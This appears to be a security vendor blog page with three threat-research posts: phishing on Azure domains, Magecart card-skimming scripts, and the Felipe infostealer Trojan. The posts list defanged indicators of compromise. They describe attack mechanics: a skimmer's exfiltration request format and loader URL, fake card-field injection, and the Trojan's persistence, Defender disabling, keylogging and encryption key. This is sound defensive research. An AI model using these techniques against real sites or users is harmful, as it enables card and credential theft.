Network URL: acpananma[.]com/love/server.php 3.121.182[.]157/smth/server.php f0278951.xsph[.]ru/server.php maprivate[.]date/server.php
Categories: Security Posts
Abusing Microsoft’s Azure domains to host phishing attacks
Recently, the Zscaler ThreatLabZ team came across various phishing attacks leveraging Microsoft Azure custom domains. These sites are signed with a Microsoft SSL certificate, so they are unlikely to raise suspicion about their authenticity. We notified Microsoft, who quickly engaged to shut these sites down, while we took action to detect and block 2,000 phishing attempts from these domains over a six-week period.
In this blog, we will describe two of the prominent vectors used and we’ll show several examples of the phishing pages.
The following figure depicts the phishing hits that were hosted using the Azure domain (Windows.net) and blocked by the Zscaler cloud.
Fig 1: Phishing hits using the Azure domain web.core.windows.net (green) and blob.core.windows.net (orange)
The following is the Whois lookup information related to the Windows.net domain.
Fig 2: Whois lookup info for domain Windows.net domain
For these phishing campaigns, the delivery vector was spam emails.
CASE 1:
In this case, the attacker sends a spam email to a user, appearing to come from a particular organization and notifying the user that seven emails have been quarantined. It states that in order to review the emails, the user has to log in using the work or school account.
Fig 3: Spam email with direct phishing link
If the user clicks the view emails button, it will redirect to the Outlook login phishing page (hxxps://onemailofice365(.)z13(.)web(.)core(.)windows(.)net/index(.)html).
Fig 4: Outlook login phishing page
Some users may get confused because of the unknown URL hosting the Outlook login page. To trick those users, the attackers have used the SSL certificate issued by Microsoft as shown below.
Fig 5: SSL certificate page of the hosted phishing URL
The following figure depicts the source code of the phishing page, which is used by attackers to collect users’ data.
Fig 6: Source code of the phishing URL page
Once the login information has been entered by the user, the form will post the user’s credential details to the compromised domain that is operated by the cybercriminals.
Fig 7: Captured data traffic that has been sent to the attacker’s site
CASE 2:
In this method, attackers send the spam email with an attached HTML file that looks like a voice message. Once the user clicks the HTML file, it will redirect to the phishing page hosted using the Azure domain.
Fig 8: Spam mail with double extension method
Fig 9: Outlook login phishing page redirected from voice message
In this phishing campaign, the attackers have injected obfuscated JavaScript to validate the user credentials that are present in their database to avoid duplication.
Fig 10: Obfuscated JavaScript to validate user credentials to avoid duplication
The following figure depicts the deobfuscated JavaScript. This code will validate the user’s credential details and sent it to the attacker’s server (hxxps://validr2vtap2l3eh544kb(.)azurewebsites(.)net/v20(.)php).
Fig 11: Deobfuscated JavaScript
Fig 12: User data will be sent to the attacker’s site using the function getValidatorURL().
In addition to the Outlook phishing campaigns, we have seen phishing campaigns associated with these Azure domains:
Microsoft Phishing, OneDrive Phishing, Adobe Document Phishing, Blockchain Phishing, and more. The following figure shows the different phishing campaigns that are hosted using the Azure domain (Windows.net).
Fig 13: Microsoft login phishing page
Fig 14: Adobe login phishing page
Fig 15: Blockchain login phishing page
Fig 16: OneDrive login phishing page
Conclusion
The Zscaler cloud blocked more than 2,000 phishing attacks over six weeks that were hosted using the Azure domain (Windows.net). The following diagram represents the various kinds of phishing campaigns that were blocked by the Zscaler cloud.
Fig 17: Detected phishing hits
Fig 18: The Zscaler Zulu URL Risk Analyzer score for one of the phishing URLs
IOCs
039282fsd(.)z19(.)web(.)core(.)windows(.)net
3652adua38ea(.)z5(.)web(.)core(.)windows(.)net
378468459jjn(.)z19(.)web(.)core(.)windows(.)net
623623626638885047749469(.)z19(.)web(.)core(.)windows(.)net
86hoi2a8j592hf2(.)z14(.)web(.)core(.)windows(.)net
accounhostoutlook(.)z35(.)web(.)core(.)windows(.)net
accountsupdate(.)z22(.)web(.)core(.)windows(.)net
adobe111(.)z19(.)web(.)core(.)windows(.)net
appriver(.)z19(.)web(.)core(.)windows(.)net azaman(.)blob(.)core(.)windows(.)net
bchwalletblockchain(.)z13(.)web(.)core(.)windows(.)net
bitcoinwalletrecovery(.)z13(.)web(.)core(.)windows(.)net
blockchainofficesupport(.)z13(.)web(.)core(.)windows(.)net
blockchainrecoverywalet(.)z13(.)web(.)core(.)windows(.)net
blockchaintradindinvest(.)z13(.)web(.)core(.)windows(.)net
businessdrivefilesharing(.)z33(.)web(.)core(.)windows(.)net
dlgeus(.)blob(.)core(.)windows(.)net dlgneu(.)blob(.)core(.)windows(.)net
dlgweu(.)blob(.)core(.)windows(.)net driveoffice-
secondary(.)z13(.)web(.)core(.)windows(.)net
eastexch030serverdatanet(.)z13(.)web(.)core(.)windows(.)net
edustudioapp(.)z19(.)web(.)core(.)windows(.)net
exchangeonline80293745(.)z27(.)web(.)core(.)windows(.)net
finance51(.)z13(.)web(.)core(.)windows(.)net
fukshawefwe22(.)blob(.)core(.)windows(.)net
fundingmessan(.)z13(.)web(.)core(.)windows(.)net
gry1asdqw1(.)blob(.)core(.)windows(.)net
h0vbkkkeebweybv(.)z33(.)web(.)core(.)windows(.)net
hgnghhghkkdkdh(.)z13(.)web(.)core(.)windows(.)net
hp94549754083400j9302975(.)z21(.)web(.)core(.)windows(.)net
hsdv(.)blob(.)core(.)windows(.)net
linknec39cclzg5l591f(.)z19(.)web(.)core(.)windows(.)net
linkp4klg1qkni76yoz8(.)z19(.)web(.)core(.)windows(.)net
lpdmsonline(.)blob(.)core(.)windows(.)net
macrofinancesoftonline(.)z14(.)web(.)core(.)windows(.)net
macrosoft0nlineoffice365(.)z13(.)web(.)core(.)windows(.)net
mailingofficeupdate(.)z14(.)web(.)core(.)windows(.)net
mailofficemicr0softvalid(.)z35(.)web(.)core(.)windows(.)net
mailofficesecurity(.)z13(.)web(.)core(.)windows(.)net
mailofficeveridiers(.)z33(.)web(.)core(.)windows(.)net
mailoutlookmcrosoftupdat(.)z11(.)web(.)core(.)windows(.)net
mailoutnewsecurity(.)z14(.)web(.)core(.)windows(.)net
mak17opa54vjxu8(.)z7(.)web(.)core(.)windows(.)net
mdj34598720843(.)z10(.)web(.)core(.)windows(.)net
microexchyz42nhszseheys(.)z13(.)web(.)core(.)windows(.)net
micromuze3rlokoyg(.)z14(.)web(.)core(.)windows(.)net
microrel00ukelukleqwkoxl(.)z13(.)web(.)core(.)windows(.)net
microsofbt50xjotm45wm7al(.)z11(.)web(.)core(.)windows(.)net
microsofd8f82gtrjyaajnsj(.)z11(.)web(.)core(.)windows(.)net
microsofdi3o152rpnnt2zr8(.)z11(.)web(.)core(.)windows(.)net
microsoffn4xwr5df3emnh1m(.)z11(.)web(.)core(.)windows(.)net
microsofn642b7o2un27wptm(.)z13(.)web(.)core(.)windows(.)net
microsofq2622c5r3wpfsdnp(.)z11(.)web(.)core(.)windows(.)net
microsofzwafvh6bisrici50(.)z11(.)web(.)core(.)windows(.)net
offic664ghdtsgdyddux(.)z13(.)web(.)core(.)windows(.)net
officcee(.)z13(.)web(.)core(.)windows(.)net
office365user37773773673(.)z19(.)web(.)core(.)windows(.)net
officedelist(.)z13(.)web(.)core(.)windows(.)net
officefiledata(.)z13(.)web(.)core(.)windows(.)net
onemailofice365(.)z13(.)web(.)core(.)windows(.)net
outlookloffice365user23k-secondary(.)z14(.)web(.)core(.)windows(.)net
outlookloffice365user25u-secondary(.)z33(.)web(.)core(.)windows(.)net
outlookloffice365user65t-secondary(.)z6(.)web(.)core(.)windows(.)net
outlookloffice365user65t(.)z6(.)web(.)core(.)windows(.)net
outlookloffice365userl6m(.)z13(.)web(.)core(.)windows(.)net
outlookofficecom(.)z33(.)web(.)core(.)windows(.)net
outlookproctionmail(.)z9(.)web(.)core(.)windows(.)net
outwebsignin2094598209(.)z21(.)web(.)core(.)windows(.)net
parmalat7(.)blob(.)core(.)windows(.)net
pjkiojxyfngsss(.)z13(.)web(.)core(.)windows(.)net
pssastd(.)blob(.)core(.)windows(.)net
rel00ukelukleqwkoxl(.)z6(.)web(.)core(.)windows(.)net
sams2948818388301(.)z13(.)web(.)core(.)windows(.)net
secureofficeportal(.)z19(.)web(.)core(.)windows(.)net
sharepo7(.)z22(.)web(.)core(.)windows(.)net
sharepointewk8xpzoywq7j(.)z19(.)web(.)core(.)windows(.)net
supportoffices365(.)z33(.)web(.)core(.)windows(.)net
thursday(.)z19(.)web(.)core(.)windows(.)net
ttsokaejqumuamreio(.)z6(.)web(.)core(.)windows(.)net
under12(.)z19(.)web(.)core(.)windows(.)net
user111777999973sdxc(.)z11(.)web(.)core(.)windows(.)net
user37377377733(.)z22(.)web(.)core(.)windows(.)net
user7779793e792782(.)z14(.)web(.)core(.)windows(.)net
user8877773737(.)z11(.)web(.)core(.)windows(.)net
usernamewebmailsingin(.)z14(.)web(.)core(.)windows(.)net
v83oybtn5zp5mmz(.)z14(.)web(.)core(.)windows(.)net
validatnec39cclzg5l591f(.)z19(.)web(.)core(.)windows(.)net
voice88(.)z19(.)web(.)core(.)windows(.)net
voicserel00ukeluklwkoxl(.)z13(.)web(.)core(.)windows(.)net
webusermicr0softtonlinee(.)z33(.)web(.)core(.)windows(.)net
were12(.)z19(.)web(.)core(.)windows(.)net
weree(.)z6(.)web(.)core(.)windows(.)net
wimdowoutlkjxjy0846335f(.)z13(.)web(.)core(.)windows(.)net
yamma(.)z13(.)web(.)core(.)windows(.)net
zebra11(.)z19(.)web(.)core(.)windows(.)net
azaman(.)blob(.)core(.)windows(.)net
dlgeus(.)blob(.)core(.)windows(.)net dlgneu(.)blob(.)core(.)windows(.)net
fiattt(.)blob(.)core(.)windows(.)net
fukshawefwe22(.)blob(.)core(.)windows(.)net
gry1asdqw1(.)blob(.)core(.)windows(.)net
hsdv(.)blob(.)core(.)windows(.)net
parmalat7(.)blob(.)core(.)windows(.)net
funksha1(.)blob(.)core(.)windows(.)net
Categories: Security Posts
Magecart activity and campaign enhancements
Magecart is a hacker group known for skimming credit or debit card details by injecting malicious JavaScript code into e-commerce sites. Back in September 2018, the Zscaler ThreatLabZ research team published a blog on Magecart activity that analyzed its attack methods and evasion tactics. We are now following up on that blog to report on recent activity we’ve seen and some enhancements in the campaign.
Magecart attack chain
In the recent campaign, we noticed a change in the attack chain. One example is the use of heavily obfuscated JavaScript with encrypted data. Also, in some cases, the malicious JavaScript code is now being injected directly in the compromised e-commerce sites, whereas in earlier attacks, the malicious code was injected remotely.
Fig 1: Hits of compromised websites in the last three months
1. Injecting heavily obfuscated malicious JavaScript dynamically
The below credit card stealer JavaScript payload is dynamically loaded when the victim presses the checkout button after loading the cart.
Fig 2: Heavily obfuscated malicious JavaScript code injected on the checkout page
The ThreatLabZ team’s smart crawler with heuristic detection shows that various JavaScript functions are obfuscated in the payload.
Fig 3: Crawler’s heuristic detection
Fig 4: Malicious script after three levels of deobfuscation by the crawler.
Analysis of the skimming toolkit
The above discussed malicious script looks for the keywords “onepage|checkout|onestep|firecheckout” in the URL and, if found, injects another script from hxxps://dnsden[.]biz/a.js.
Fig 5: Script injected from hxxps://dnsden[.]biz
The above injected obfuscated script hxxps://dnsden[.]biz/a.js contains encrypted data which is decrypted by the RC4 algorithm in the runtime.
Fig 6: Use of RC4 algorithm in ‘a.js’
The encrypted data in ‘a.js’ script after RC4 decryption ends up injecting the main skimming script, which is responsible for extracting and sending the victim's credit card details back to the attacker.
Encrypted data - w5rDvcOKwrnCnsKYcWHCgAcaUsOFVcOQXnZpw48KfjZ/CMObMMOiwq7Cm1XDvFDCl8KBEsKRE8Oyw6krWcK0wo1Xw7J+w6/DknoJasKVScKZOhzCoRI=
Decrypted data -
The ‘universal.js’ is also obfuscated and has the same encryption algorithm as ‘a.js’. After decryption, it calls a function on the form change event and collects all the payment info entered by the victim.
Fig 7: Collecting payment card details
Fig 8: Sends victim’s credit card details to C&C
Fig 9: POST request with the stolen credit card details
info=Base64(stolen_data)&hostname=compromised_site&key=random_key
Stolen data includes billing and payment details.
Fig 10: Decoded stolen data
2. Injecting malicious JavaScript directly in the compromised site
Fig 11: Malicious JavaScript code hosted on the compromised e-commerce site is injected
Fig 12: Malicious JavaScript code hosted on a compromised site for skimming payment card details
Analysis of the skimming toolkit
The malicious JavaScript code first checks for the two cookie names “$s” and “$sent”; if these cookies are set, data is stored into variable after decoding. These cookie values are referred to each time any payment card details are being entered, and values are updated if the payment card details are new.
Fig 13: Getting values from the two cookie names “$s” and “$sent”
To get payment card details, data from all the tags, such as input, select, and text area, are stored and the script undergoes a basic length check on the card details.
Fig 14: Validating length of payment card details
After validating payment card details, a hash of the card details is calculated and checked to determine if the same hash value is available in the data retrieved from the cookie “$sent” earlier. Payment details are dropped if any hash match is found.
Fig 15: Checking the hash value of card details against data retrieved earlier from the cookie
Each time any new payment card details are entered, the details are sent to the attacker and the hash value for these details is appended to the cookie value “$sent”; this cookie value is used to check if the details being entered are new.
Fig 16: Value of the cookie “$sent” stored in the victim's browser
On decoding the above Base64 encoded value of the cookie “$sent,” we get the MD5 array of the payment card details. By storing the encrypted payment card details as a cookie, the attacker has added the ability to drop duplicate details being sent to the attacker, as payment details are always checked against the cookie value and only unique card details are sent to the attacker.
After all the above checks are encoded, the payment card details are sent to the attacker-controlled site.
Fig 17: GET request with the stolen information
In a similar skimming toolkit, along with the above-discussed cookie logic, attackers are injecting fake payment card fields into the compromised site and hiding legitimate fields once the victim selects credit card as the payment method.
Fig 18: Fake credit card details field and malicious JavaScript file
Fig 19: HTML code for the fake credit card details fields in the malicious script
Fig 20: Malicious script injecting the fake credit card details fields
Fig 21: Above, injected credit card fields; below, legitimate credit card fields
The injected and legitimate credit card fields look similar, but from the HTML input field attributes (ID and type), there are noticeable differences. In the injected fields, the card number ID is "_ccnumber" and the type is "text," while in a legitimate card number, the ID is "credit-card-number" and the type is "tel."
IOCs
dnsden[.]biz jquery-bin[.]com/gate[.]php lumbertrans[.]com/errors/default/gate[.]php luxbagsgirl[.]com/errors/default/gate[.]php jsreload[.]pw/gate[.]php saterday-race[.]com/gate[.]php jqueryextd[.]at/gate[.]php routingzen[.]com/gate[.]php mz-at-shop[.]de/errors/default/gate[.]php 93[.]187[.]129[.]249/gate[.]php developer-js[.]info/gate[.]php google-anaiytic[.]com/fonts[.]googleapis/gate[.]php magento-analytics[.]com/gate[.]php gtows[.]com
Compromised sites
shop.triggerbrothers[.]com[.]au custommagnetsdirect[.]com lumbertrans[.]com sunbuggy[.]com saterday-race[.]com windblox[.]com cakedecoratingsolutions[.]com[.]au network-ed[.]com[.]au adooq[.]com mz-at-shop[.]des reddotarms[.]com sprucela[.]com/ t[.]cltradingfl[.]com worldcraftindustries[.]com reallifecatholic[.]com wbminternational[.]com whistlerrides[.]ca/ smartsilk[.]com/ classictruckglass[.]com oconnellsclothing[.]com/skin/ purefruittechnologies[.]com/ cornerstone-arch[.]com minitruckusa[.]com magformers[.]com ravishingcosmetics[.]com alamoshoes[.]com/ salonsavings[.]com/ bathroompanelsuperstore[.]com britishfitness[.]com bumperworksonline[.]com niftyconcept[.]com cornerstone-arch[.]com decorprice[.]com
Conclusion
These new developments in an ongoing campaign illustrate some of the ways that attackers are continuously enhancing their methods for stealing sensitive information like login credentials, bank or payment card details, personally identifiable information, and so on. The Magecart campaign has been active for a long time and continues to evolve and hone its techniques to get better at stealing payment card information and related data.
Zscaler ThreatLabZ actively tracks such campaigns and protects customers from these types of attacks.
Categories: Security Posts
Felipe, a new infostealer Trojan
The Zscaler ThreatLabZ team came across a new strain of infostealer Trojan called Felipe, which silently installs itself onto a user’s system and connects to a command-and-control (C&C) server to send system information from the compromised system. This malware is compiled for both 32-bit and 64-bit Windows operating systems. Felipe basically steals the victim's debit and credit card information and sends it, along with other personal information, to the remote C&C server. It also sets a date and time to perform other malicious activity upon successful infection of the victim machine.
The files dropped by malware include:
Win XP:
%UserProfile%\Local Settings\Temp\vshost.exe %UserProfile%\Local Settings\Temp\explorer32.exe %UserProfile%\Local Settings\Temp\install2.bat %UserProfile%\Local Settings\Temp\infect.txt
Win7/Win10:
%UserProfile%\AppData\Local\Temp\vshost.exe %UserProfile%\AppData\Local\Temp\explorer32.exe %UserProfile%\AppData\Local\Temp\install2.bat %UserProfile%\AppData\Local\Temp\infect.txt
The Felipe Trojan enumerates the system and tries to determine whether it has already been infected by checking the files vshost32.exe and vshost64.exe in the compromised system.
The parent file downloads its payloads to %UserProfile%\AppData\Local\Temp\update2804. If this folder already exists, the malware deletes the folder and files inside. Once the folder is deleted, the malware will create a new folder with the same name in hidden mode.
When the update2804 folder is created, the malware downloads its different payloads within a gap of just 50 milliseconds.
After downloading the payload, the malware copies it to a special directory temp folder in the system in hidden mode and executes it. First, it will execute the install2.bat file and then it will execute vshost.exe.
Below is the code of install2.bat:
The batch file will perform registry changes responsible for the following:
Run entries for vshost.exe, exolorer32.exe to ensure persistence
Disable Windows Defender
Bypass UAC control
Excluding path of temp folder in Windows Defender
Vshost.exe checks the victim's bank cards by checking a card's length or the starting numbers of cards, such as:
American Express card: number should begin from 34 or 37
Visa: card length between 13 or 16
Mastercard: card length to be 16
Discover: card length to be 16 and begin from 6011 or 65
Below is a snapshot of some of these instructions:
The following is the algorithm to check the card's validity:
Process digits from right to left. Double the alternate digit starting from first.
Break the alternative digits if addition is greater than 10 (e.g., 28 = 2 + 8 (10) or 19 = 1 + 9 (10)).
Return the 10's complement of the total.
Finally, it verifies the checksum digit. It will be invalid if the checksum is not modular 10.
Snapshot of the algorithm:
If the system is already infected, the malware looks for the filename infect.txt in the temp folder. If it is already there, it sends the below data; otherwise, it sends a request to the C&C to further download the file infect.text. It also sends the victim's system information and writes “infect” in the infect.txt file.
The Felipe Trojan gets a memory dump of processes by checking the memory addresses that can store data. Basically, it scans the process memory and, whenever a process starts, the system allocates enough memory for its heap, stack, and regions. However, Windows won't allocate an "entire block" of memory; it tries to allocate any free memory available for the User-Mode. The following are the methods used for the memory dump:
GetSystemInfo() Retrieves random information about the system in a structure called SYSTEM_INFO. This structure also contains two variables: minimumApplicationAddress & maximumApplicationAddress, which store the minimum and the maximum address where the system can allocate memory for User-Mode applications.
VirtualQueryEx() This method gets information about a range of memory addresses and returns it into a structure named MEMORY_BASIC_INFORMATION. It tells us the range of a memory chunk that starts from the specified address.
ReadProcessMemory() Used to read a number of bytes starting from a specific memory address.
OpenProcess() Returns a handle to a specific process; the process must be opened.
WriteProcessMemory() Writes data to an area of memory in a specified process.
After the memory dump, the malware tries to find the victim's used bank card from memory, and fetches this information to send to the C&C. Below is a snapshot of it:
Encryption method for sending data to C&C:
The malware uses Triple Data Encryption Standard (3DES) algorithm. The first step is to create a simple wrapper class that encapsulates the 3DES algorithm and stores the encrypted data as a base-64 encoded string. Then, that wrapper is used to securely store private user data in a publicly accessible text file.
The 3DES algorithm provides two-way encryption. It needs the private key string as the wrapper to generate a unique decrypted string. Here, the malware uses "L%f@Y7Boolean4%()F$y" as a private key.
For more info: https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language-features/strings/walkthrough-encrypting-and-decrypting-strings
Sending data to the C&C:
The malware uses the free “geoPlugin” web service to determine the victim's system and location information. The following are the services used by the malware from the geoPlugin web service:
System IP
City
Region code
Country name
Timer Set:
The malware sets the time in the program to shut down the system and restart on a specific day. In this example, the time should be between 5:06 a.m. and 6:09 a.m. on Friday, then the system gets shut down.
The command to shutdown is:
Interaction.Shell("shutdown /r /t 0", AppWinStyle.MinimizedFocus, false, -1); Switches:
/r: shut down and then restart the local computer /t: time, in seconds, between the execution of the shutdown command and the actual shutdown or restart AppWinStyle.MinimizedFocus: starts the program minimized and with focus
After the restart, the malware fetches hardware information from the victim's system, including the serial number and running processes. If the “explorer32.exe” process is not found in the running processes, the malware downloads from the C&C and executes it from the temp folder for performing further malicious activities.
It uses the GetAsyncKeyState() Win API to query the state of each key on the keyboard. From the return value of GetAsyncKeyState(), it can be determined whether the key is up or down at the time the function is called.
Network communication:
Indicators of Compromise:
Filename
Md5
vshost.exe
15CE8F849FFF4CC8675900EC838A93F9
down.exe
61B06E49D514F3DC5BE4F4EF08F6B43C
explorer32.exe
D912771C8CD5720AD835E08EB80A77B6
install2.bat
7D016A3BB29904A6E00161694FC6AB4E
Download URLs:
192.99.215[.]95/uploads Inmemory[.]tech
Categories: Security Posts
